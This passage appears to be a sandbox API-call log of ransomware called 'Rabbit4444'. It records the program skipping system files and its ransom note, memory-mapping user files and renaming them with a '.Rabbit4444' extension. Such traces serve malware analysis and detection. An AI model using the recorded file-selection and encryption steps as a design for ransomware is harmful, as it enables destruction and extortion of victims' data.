[0062.949] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.949] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Rabbit4444.exe") returned -1 [0062.949] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2=".") returned 1 [0062.949] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="..") returned 1 [0062.949] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="windows") returned -1 [0062.949] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="bootmgr") returned -1 [0062.949] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="pagefile.sys") returned -1 [0062.949] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="boot") returned -1 [0062.949] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="ids.txt") returned -1 [0062.949] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="NTUSER.DAT") returned -1 [0062.949] lstrcpyW (in: lpString1=0x130ec1e, lpString2="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" | out: lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" [0062.949] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", dwFileAttributes=0x2020) returned 1 [0062.950] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", dwFileAttributes=0x2004) returned 1 [0062.950] lstrlenW (lpString="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 65 [0062.950] lstrlenW (lpString="Rabbit4444") returned 10 [0062.950] lstrcmpiW (lpString1="9BDE565AF1", lpString2="Rabbit4444") returned -1 [0062.950] lstrlenW (lpString=".dll") returned 4 [0062.950] lstrcmpiW (lpString1="5AF1", lpString2=".dll") returned 1 [0062.950] lstrlenW (lpString=".lnk") returned 4 [0062.950] lstrcmpiW (lpString1="5AF1", lpString2=".lnk") returned 1 [0062.950] lstrlenW (lpString=".ini") returned 4 [0062.950] lstrcmpiW (lpString1="5AF1", lpString2=".ini") returned 1 [0062.950] lstrlenW (lpString=".sys") returned 4 [0062.950] lstrcmpiW (lpString1="5AF1", lpString2=".sys") returned 1 [0062.950] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.951] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.951] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15426133421) returned 1 [0062.951] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=400) returned 1 [0062.951] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0062.951] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0062.951] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x490, lpName=0x0) returned 0x27c [0062.952] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x490) returned 0x70000 [0062.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0062.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0062.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0062.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0062.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0062.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0062.953] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15426416892) returned 1 [0062.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0062.954] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0062.954] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.954] CloseHandle (hObject=0x27c) returned 1 [0062.954] CloseHandle (hObject=0x2a0) returned 1 [0062.954] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.Rabbit4444") returned 191 [0062.954] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.rabbit4444"), dwFlags=0x1) returned 1 [0062.955] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdaf50849, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf50849, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x12e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0062.955] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.955] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.955] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="Rabbit4444.exe") returned -1 [0062.955] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".") returned 1 [0062.955] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="..") returned 1 [0062.955] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="windows") returned -1 [0062.955] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="bootmgr") returned -1 [0062.955] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="pagefile.sys") returned -1 [0062.955] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="boot") returned -1 [0062.955] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="ids.txt") returned -1 [0062.955] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="NTUSER.DAT") returned -1 [0062.955] lstrcpyW (in: lpString1=0x130ec1e, lpString2="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" | out: lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" [0062.955] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2020) returned 1 [0062.956] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2004) returned 1 [0062.956] lstrlenW (lpString="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 32 [0062.956] lstrlenW (lpString="Rabbit4444") returned 10 [0062.956] lstrcmpiW (lpString1="2B8CFD4157", lpString2="Rabbit4444") returned -1 [0062.956] lstrlenW (lpString=".dll") returned 4 [0062.956] lstrcmpiW (lpString1="4157", lpString2=".dll") returned 1 [0062.956] lstrlenW (lpString=".lnk") returned 4 [0062.956] lstrcmpiW (lpString1="4157", lpString2=".lnk") returned 1 [0062.956] lstrlenW (lpString=".ini") returned 4 [0062.956] lstrcmpiW (lpString1="4157", lpString2=".ini") returned 1 [0062.956] lstrlenW (lpString=".sys") returned 4 [0062.956] lstrcmpiW (lpString1="4157", lpString2=".sys") returned 1 [0062.956] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\57c8edb95df3f0ad4ee2dc2b8cfd4157"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.956] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.957] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15426727597) returned 1 [0062.957] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=302) returned 1 [0062.957] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0062.957] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0062.957] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x430, lpName=0x0) returned 0x27c [0062.958] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x430) returned 0x70000 [0062.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0062.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0062.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0062.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0062.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0062.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0062.960] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15427028629) returned 1 [0062.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0062.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0062.960] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.960] CloseHandle (hObject=0x27c) returned 1 [0062.960] CloseHandle (hObject=0x2a0) returned 1 [0062.960] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.Rabbit4444") returned 158 [0062.960] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\57c8edb95df3f0ad4ee2dc2b8cfd4157"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\57c8edb95df3f0ad4ee2dc2b8cfd4157.rabbit4444"), dwFlags=0x1) returned 1 [0062.961] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdaf50849, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf50849, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0062.961] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.961] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.961] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="Rabbit4444.exe") returned -1 [0062.961] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".") returned 1 [0062.961] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="..") returned 1 [0062.961] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="windows") returned -1 [0062.961] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="bootmgr") returned -1 [0062.961] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="pagefile.sys") returned -1 [0062.961] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="boot") returned -1 [0062.961] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="ids.txt") returned -1 [0062.961] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="NTUSER.DAT") returned -1 [0062.961] lstrcpyW (in: lpString1=0x130ec1e, lpString2="77EC63BDA74BD0D0E0426DC8F8008506" | out: lpString1="77EC63BDA74BD0D0E0426DC8F8008506") returned="77EC63BDA74BD0D0E0426DC8F8008506" [0062.961] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2020) returned 1 [0062.961] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2004) returned 1 [0062.962] lstrlenW (lpString="77EC63BDA74BD0D0E0426DC8F8008506") returned 32 [0062.962] lstrlenW (lpString="Rabbit4444") returned 10 [0062.962] lstrcmpiW (lpString1="C8F8008506", lpString2="Rabbit4444") returned -1 [0062.962] lstrlenW (lpString=".dll") returned 4 [0062.962] lstrcmpiW (lpString1="8506", lpString2=".dll") returned 1 [0062.962] lstrlenW (lpString=".lnk") returned 4 [0062.962] lstrcmpiW (lpString1="8506", lpString2=".lnk") returned 1 [0062.962] lstrlenW (lpString=".ini") returned 4 [0062.962] lstrcmpiW (lpString1="8506", lpString2=".ini") returned 1 [0062.962] lstrlenW (lpString=".sys") returned 4 [0062.962] lstrcmpiW (lpString1="8506", lpString2=".sys") returned 1 [0062.962] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\77ec63bda74bd0d0e0426dc8f8008506"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.962] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.962] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15427298533) returned 1 [0062.962] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=290) returned 1 [0062.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0062.962] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0062.962] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x430, lpName=0x0) returned 0x27c [0062.964] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x430) returned 0x70000 [0062.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0062.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0062.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0062.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0062.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0062.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0062.965] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15427606963) returned 1 [0062.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0062.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0062.965] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.966] CloseHandle (hObject=0x27c) returned 1 [0062.966] CloseHandle (hObject=0x2a0) returned 1 [0062.966] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506.Rabbit4444") returned 158 [0062.966] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\77ec63bda74bd0d0e0426dc8f8008506"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\77ec63bda74bd0d0e0426dc8f8008506.rabbit4444"), dwFlags=0x1) returned 1 [0062.966] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdaf2a7e9, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdaf2a7e9, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xff50e022, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x1ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", cAlternateFileName="B912B2~1")) returned 1 [0062.966] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.966] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.966] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="Rabbit4444.exe") returned -1 [0062.966] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2=".") returned 1 [0062.966] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="..") returned 1 [0062.966] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="windows") returned -1 [0062.967] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="bootmgr") returned -1 [0062.967] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="pagefile.sys") returned -1 [0062.967] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="boot") returned -1 [0062.967] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="ids.txt") returned -1 [0062.967] lstrcmpiW (lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", lpString2="NTUSER.DAT") returned -1 [0062.967] lstrcpyW (in: lpString1=0x130ec1e, lpString2="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE" | out: lpString1="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE") returned="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE" [0062.967] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", dwFileAttributes=0x2020) returned 1 [0062.967] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE", dwFileAttributes=0x2004) returned 1 [0062.967] lstrlenW (lpString="B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE") returned 65 [0062.967] lstrlenW (lpString="Rabbit4444") returned 10 [0062.967] lstrcmpiW (lpString1="60981195AE", lpString2="Rabbit4444") returned -1 [0062.967] lstrlenW (lpString=".dll") returned 4 [0062.967] lstrcmpiW (lpString1="95AE", lpString2=".dll") returned 1 [0062.967] lstrlenW (lpString=".lnk") returned 4 [0062.967] lstrcmpiW (lpString1="95AE", lpString2=".lnk") returned 1 [0062.967] lstrlenW (lpString=".ini") returned 4 [0062.967] lstrcmpiW (lpString1="95AE", lpString2=".ini") returned 1 [0062.967] lstrlenW (lpString=".sys") returned 4 [0062.967] lstrcmpiW (lpString1="95AE", lpString2=".sys") returned 1 [0062.967] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE" (normalized: 